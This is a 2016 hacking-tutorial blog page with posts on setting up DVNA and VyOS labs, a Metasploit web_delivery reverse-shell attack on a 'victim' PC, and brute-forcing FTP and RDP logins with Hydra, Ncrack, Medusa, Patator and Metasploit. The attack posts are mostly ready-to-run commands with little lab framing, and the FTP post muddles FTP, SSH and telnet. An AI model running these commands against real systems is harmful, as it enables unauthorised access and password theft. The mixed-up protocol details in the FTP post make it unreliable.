Web Hacking Lab Setup using DVNA in Kali Linux

at 7:40 AM Sunday, March 13, 2016 0 comments
Damn Vulnerable Node Application (DVNA) is a Node.js web application that is damn vulnerable. Its intended purpose is to teach secure coding concepts to web developers who use Node, and to explore web application vulnerabilities in a controlled class environment or to serve as a cyber range for capture the flag events. It's loaded with common web vulnerabilities and various levels of complexity.

Open your kali Linux terminal and type the following command


sudo apt-get install git


Now type

wget -qO- https://raw.github.com/creationix/nvm/master/install.sh | sh

source ~/.bashrc


In next type
nvm install 5.3.0
nvm use 5.3.0
git clone https://github.com/quantumfoam/DVNA.git
cd DVNA/
npm set progress=false


In next step type



Now type

node dvna.js


Navigate to http://localhost:3000/

Labels: ,

How to Setup VyOS (Virtual Router Pentest Lab)

at 1:44 AM Monday, March 7, 2016 0 comments
VyOS is a Linux-based network operating system that provides software-based network routing, firewall, and VPN functionality.  Its configuration syntax and command-line interface are loosely derived from Juniper JUNOS as modeled by the XORP project.

First Download Vyos iso image from here


Open VMWARE tool, create a new virtual machine. Select Installer disc image file and select OS image of vyos and click on next.


Enter your virtual machine name and location. Click next.


Set Ram upto 1 GB for vyos and click to network adapter


Next we are choosing our first network adapter. Connect it to the Bridge Adapter and click on close.


Then click on finish.


Now installation process will start automatically. It takes a few seconds for the VM to boot and VyOS to load.


After boot screen hit enter and login to vyos using following credentials:

Username : vyos
Password : vyos


Installation of Vyos on local disk. In order to do that simply execute command: install image and press enter

Now type yes and press enter in next option Select auto partition press enter


In next option type yes to continue press enter


After the installation is complete Issue the reboot command Again type: yes press enter


Login again to vyos and we will start with setting

Now we will check network interfaces using show interfaces command

Now Enter configuration mode by typing “conf” and have a look at the current interfaces:


After you made some changes, you need to enter the “commit” and “save” commands.

Now we will setup network interfaces:

set interfaces ethernet eth0 address dhcp

Now again you need to enter the “commit” and “save” commands. Now we will check network interfaces using run show interfaces command.


Now before we are able to connect to our router with SSH, we will enable SSH In order to do it execute following commands:

 set service ssh Commit and save.

Now before we are able to connect to our router with TELNET, we need to enable that. To do so, issue the following commands

set service telnet Commit and save


To check all enable service type the following command

Show service
Labels: ,

Hack Remote Linux PC using PHP File

at 9:47 PM Wednesday, March 2, 2016 0 comments
This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

Exploit Targets
Linux

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.22 (IP of Local Host)
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)>exploit

Labels: ,

6 Ways to Hack FTP Login Password

at 3:20 AM 0 comments

In this article, we will learn how to gain control over our victim's PC through SSH Port. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103 ftp

-L: denotes path for username list
-P:  denotes path for password list
Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the telnet username as pavan and password as toor.




xHydra

This is the graphical version to apply dictionary attack via FTP port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select FTP in box against Protocol option and give the port number 21 against the port option.




Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.




After doing this, go to Start tab and click on Start button on the left.
Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.




Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 
Run the following command

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.103:21

Here
-U: denotes path for username list
-P:  denotes path for password list
As you can observe that we had successfully grabbed the telnet username as pavan and password as toor.




Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few
Run the following command
Medusa  -h 192.168.1.103 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M ftp

Here
-U: denotes path for username list
-P:  denotes path for password list
As you can observe that we had successfully grabbed the telnet username as pavan and password as toor.




Patator

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. It is quite useful for making brute force attack on several ports such as FTP, HTTP, SMB and etc.
patator ftp_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt 




From given below image you can observe that the process of dictionary attack starts and thus, you will attain the username and password of your victim.




Metasploit

This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole
 Now type use auxiliary/scanner/ftp/ftp_login
msf exploit (ftp_login)>set rhosts 192.168.1.103 (IP of Remote Host)
msf exploit (ftp_login)>set user_file  /root/Desktop/user.txt
msf exploit (ftp_login)>set userpass_file  /root/Desktop/pass.txt
msf exploit (ftp_login)>set stop_on_success true
msf exploit (ftp_login)> exploit

From given below image you can observe that we had successfully grabbed the FTP username and password.


Labels: , ,

2 Ways to Hack Remote Desktop Password using kali Linux

at 9:47 AM Monday, February 29, 2016 0 comments
Remote Desktop run on port 3389 so in order to discover information regarding the RDP we need to execute the following script:

Nmap –sV 192.168.0.100

Xhydra
Open your Kali Linux terminal and Type xhydra and press enter

In the target tab, select
Single Target: 192.168.0.100

Protocol: rdp


In passwords tab, select

Username: Type Victim user name

In the passwords, select the password list option and browse to select your Passwords file. Here I have used my custom password file.


Now select start tab and click on start button, the password cracking begins and result is as follows


Hydra

Open kali linux terminal Run the following command

 hydra -l raj -P /root/Desktop/pass.txt 192.168.0.100 rdp

·         -l indicates a single username (use -L for a username list)
·         -P indicates use the following password list
·         ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra hack the password


To connect to victim using remote desktop, we can use rdesktop program 

rdesktop -u -p  


Labels: ,
Subscribe to: Posts (Atom)